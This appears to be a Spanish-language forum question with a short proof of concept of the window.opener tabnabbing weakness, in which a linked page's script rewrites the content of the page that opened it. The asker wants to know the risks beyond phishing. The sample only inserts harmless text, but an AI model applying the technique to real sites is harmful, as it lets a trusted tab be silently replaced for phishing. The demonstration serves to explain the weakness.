No sé si está al tanto de esta falla, pero aquí hay un ejemplo básico:
somepage.html (señalando a malware.html ):
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Test</title>
</head>
<body>
<p id="test">Some text<p>
<p><a href="malicious.html">lien</a></p>
</body>
</html>
malicioso.html:
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Test</title>
</head>
<body>
<script>
var win = window.opener;
win.document.getElementById("test").innerHTML = "<strong> This will be written on somepage.html</strong>";
</script>
</body>
</html>
Si hacemos clic en el enlace en somepage.html , esta misma página será modificada por malware.html . Aparte del phishing, ¿cuáles son los riesgos de esta falla?
Esta falla ha sido parcheada solo en Chrome y Opera.